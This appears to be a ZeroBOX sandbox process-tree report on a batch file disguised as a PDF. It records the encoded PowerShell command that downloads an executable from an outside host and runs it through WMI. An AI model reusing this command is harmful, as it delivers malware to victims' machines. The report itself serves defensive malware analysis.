| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xHmp" C:\Users\test22\AppData\Local\Temp\PAXDETAILSpdf.bat
2580
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\PAXDETAILSpdf.bat
  2652
  - powershell.exe poWersheLl -EX bYPasS -NOP -w 1 -ec IAAgACAACQBTAGUAVAAtAGMATwBOAHQAZQBuAFQAIAAJAC0AdgBBACAACQAJAAkACQAJACgAIAAJAC4AKAAnAE4ARQBXAC0AbwBCAGoARQBDACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAHQAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgAAkACQAoACAACQBbAEMAaABhAHIAXQAgACAACQAgACAAIAAwAHgANgBFACAAIAAJACAAIAAgACAAIAAJACAAIAAgACsAIAAgAAkAIAAgACAAWwBjAEgAYQByAF0AIAAgAAkAIAAgACAAMABYADYANQAgACAACQAgACAAIAAgACAACQAgACAAIAArACAAIAAJACAAIAAgAFsAQwBoAEEAcgBdACAAIAAJACAAIAAgADAAWAA1ADQAIAAgAAkAIAAgACAAIAAgAAkAIAAgACAAKwAgACAACQAgACAAIABbAEMASABBAFIAXQAgACAACQAgACAAIAAwAHgAMgBFACAAIAAJACAAIAAgACAAIAAJACAAIAAgACsAIAAgAAkAIAAgACAAWwBDAEgAQQBSAF0AIAAgAAkAIAAgACAAMAB4ADUANwAgACAACQAgACAAIAAgACAACQAgACAAIAArACAAIAAJACAAIAAgAFsAYwBoAEEAcgBdACAAIAAJACAAIAAgADAAWAA2ADUAIAAgAAkAIAAgACAAIAAgAAkAIAAgACAAKwAgACAACQAgACAAIABbAGMAaABBAHIAXQAgACAACQAgACAAIAAwAFgANAAyACAAIAAJACAAIAAgACAAIAAJACAAIAAgACsAIAAgAAkAIAAgACAAWwBjAGgAQQByAF0AIAAgAAkAIAAgACAAMABYADYAMwAgACAACQAgACAAIAAgACAACQAgACAAIAArACAAIAAJACAAIAAgAFsAYwBoAEEAcgBdACAAIAAJACAAIAAgADAAWAA0AEMAIAAgAAkAIAAgACAAIAAgAAkAIAAgACAAKwAgACAACQAgACAAIABbAEMAaABhAHIAXQAgACAACQAgACAAIAAwAHgANgA5ACAAIAAJACAAIAAgACAAIAAJACAAIAAgACsAIAAgAAkAIAAgACAAWwBDAGgAQQByAF0AIAAgAAkAIAAgACAAMABYADYANQAgACAACQAgACAAIAAgACAACQAgACAAIAArACAAIAAJACAAIAAgAFsAQwBIAGEAUgBdACAAIAAJACAAIAAgADAAeAA0AEUAIAAgAAkAIAAgACAAIAAgAAkAIAAgACAAKwAgACAACQAgACAAIABbAEMASABBAHIAXQAgACAACQAgACAAIAAwAHgANQA0ACAAIAAJACAAIAAgACAACQAJACkAKQAuACgAIAAgACAACQAJAFsAYwBIAGEAUgBdACAAIAAgACAAMABYADQANAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAEEAcgBdACAAIAAgACAAMABYADQARgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAGEAUgBdACAAIAAgACAAMABYADcANwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAEEAcgBdACAAIAAgACAAMAB4ADYARQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAGEAUgBdACAAIAAgACAAMAB4ADQAQwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAGEAcgBdACAAIAAgACAAMABYADQARgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAGEAUgBdACAAIAAgACAAMAB4ADQAMQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAGEAUgBdACAAIAAgACAAMABYADQANAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAEEAcgBdACAAIAAgACAAMABYADQANAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAEEAUgBdACAAIAAgACAAMABYADQAMQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAGEAUgBdACAAIAAgACAAMAB4ADUANAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAGEAcgBdACAAIAAgACAAMABYADYAMQAgACAAIAAgACAACQAJACkALgBJAE4AVgBPAGsARQAoACAACQAJACAACQAgACgAHSBoAHQAdABwAHMAOgAvAC8AaQBrAHUAawB1AGMAbABvAHUAZAAuAB0gIAAgAAkAIAAgAAkAKwAgACAACQAdIHUAcwAvAB0gIAAgAAkAIAAgAAkAKwAgACAACQAdIHIAZQBzAHQAHSAgACAACQAgACAACQArACAAIAAJAB0gQQBQAEkALwBwAHUAdAB0AHkAHSAgACAACQAgACAACQArACAAIAAJAB0gLgBlAB0gIAAgAAkAIAAgAAkAKwAgACAACQAdIHgAZQAdICAAIAAJACkAIAAgACAAIAAgACkAIAAgAC0ARQBuACAAIAAgACAAIAAoACAAWwBjAGgAYQByAF0AIAAgACAAIAAwAHgANgAyACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAEgAQQBSAF0AIAAgACAAIAAwAHgANwA5ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAGgAYQBSAF0AIAAgACAAIAAwAHgANwA0ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAEgAQQByAF0AIAAgACAAIAAwAHgANgA1ACAAIAAgACAAIAAJAAkACQAJAAkAKQAgACAAIAAgAC0AcABBAHQAaAAgAAkACQAJAAkACQAdICQARQBuAFYAOgBQAFUAYgBsAGkAYwBcAHMAZQBmAGQAcAByAG8AZABkAHMALgBlAHgAZQAdICAACQAJADsAIABJAG4AVgBvAGsAZQAtAHcATQBJAG0AZQBUAGgAbwBkACAACQAJAFcASQBOADMAMgBfAHAAcgBvAEMARQBTAHMAIAAJAAkAQwBSAGUAYQBUAEUAIAAdICQARQBOAFYAOgBwAHUAQgBMAGkAYwBcAHMAZQBmAGQAcAByAG8AZABkAHMALgBlAHgAZQAdIA==
    2740

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents